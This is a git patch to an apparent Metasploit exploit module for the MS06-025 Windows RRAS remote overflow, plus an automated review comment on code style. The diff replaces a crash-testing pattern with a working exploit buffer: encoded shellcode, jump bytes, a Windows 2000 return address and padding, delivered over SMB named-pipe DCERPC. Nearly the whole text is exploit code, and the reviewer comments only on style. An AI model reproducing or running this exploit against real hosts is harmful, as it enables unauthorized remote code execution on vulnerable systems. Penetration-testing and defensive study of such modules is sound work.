From 7a3bfce2b0a86afd025f7533afccf76c1237d9ba Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Wed, 14 Jun 2006 21:26:43 +0000
Subject: [PATCH] Straight port from anonymous
git-svn-id: file:///home/svn/incoming/trunk@3662 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/exploits/windows/smb/ms06_025_rras.rb | 47 +++++++++----------
 1 file changed, 23 insertions(+), 24 deletions(-)
diff --git a/modules/exploits/windows/smb/ms06_025_rras.rb b/modules/exploits/windows/smb/ms06_025_rras.rb
index 111d97b10e..540da34f74 100644
--- a/modules/exploits/windows/smb/ms06_025_rras.rb
+++ b/modules/exploits/windows/smb/ms06_025_rras.rb
@@ -31,12 +31,9 @@ class Exploits::Windows::Smb::MS06_025_RRAS < Msf::Exploit::Remote
 'Privileged' => true,
 'Payload' =>
 {
- 'Space' => 1000,
- 'BadChars' => "",
- 'Compat' =>
- {
- # -ws2ord XXX?
- },
+ 'Space' => 1104,
+ 'BadChars' => "\x00",
+ 'StackAdjustment' => -3500,
 },
 'Platform' => 'win',
 'Targets' =>
@@ -44,7 +41,7 @@ class Exploits::Windows::Smb::MS06_025_RRAS < Msf::Exploit::Remote
 [ 'Windows 2000 TEST',
 {
- 'Ret' => 0x767a38f6, # umpnpmgr.dll
+ 'Ret' => 0x7571c1e4,
 }
 ]
 ],
@@ -64,39 +61,41 @@ class Exploits::Windows::Smb::MS06_025_RRAS < Msf::Exploit::Remote
 connect()
 smb_login()
- handle = dcerpc_handle('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
+ handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
 print_status("Binding to #{handle} ...")
 dcerpc_bind(handle)
 print_status("Bound to #{handle} ...")
+ pat =
+ payload.encoded +
+ "\xeb\x06" +
+ Rex::Text.rand_text_alphanumeric(2) +
+ [target.ret].pack('V') +
+ "\xe9\xb7\xfb\xff\xff"
+
+ req = [1, 0x49].pack('VV') + pat + Rex::Text.rand_text_alphanumeric(0x4000-pat.length)
+ len = req.length
+ stb =
+ NDR.long(0x20000) +
+ NDR.long(len) +
+ req +
+ NDR.long(len)
- str = [1, 0x49].pack('VV') + Rex::Text.pattern_create(0x4000) + "\x00"
-
- stubdata =
- # [1, ... and [2, ... result in different crashes...
- [1, str.length, 0, str.length].pack('VVVV') + str + NDR.long(str.length)
-
+
 print_status("Calling the vulnerable function...")
+
 begin
- dcerpc.call(0x0C, stubdata)
+ dcerpc.call(0x0C, stb)
 rescue Rex::Proto::DCERPC::Exceptions::NoResponse
- print_good('server did not respond, this is expected')
 rescue => e
- if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
- print_good('server disconnected, this is expected')
- else
+ if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
 raise e
 end
- else
- print_status('should be owned now...')
 end
 # Cleanup handler
 disconnect
-
- p dcerpc.last_response.stub_data
-
 end
 end
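Review bot: The `rescue Rex::Proto::DCERPC::Exceptions::NoResponse` arm is now empty and the `rescue => e` arm decides on a regex over `e.to_s`, so the new error handling no longer records which outcomes are tolerated on purpose; a comment above `begin`, e.g. `# NoResponse and STATUS_PIPE_DISCONNECTED are tolerated here; anything else propagates`, would keep that intent readable for the next maintainer. Inside a `rescue`, a bare `raise` re-raises the current exception, so `raise e` can simply be `raise`. The rename from `stubdata` to `stb` loses descriptiveness, and `0x4000-pat.length` reads better as `0x4000 - pat.length`. The enclosing method begins before this hunk; of the two closing `end`s at the bottom, the second appears to close the class rather than the method.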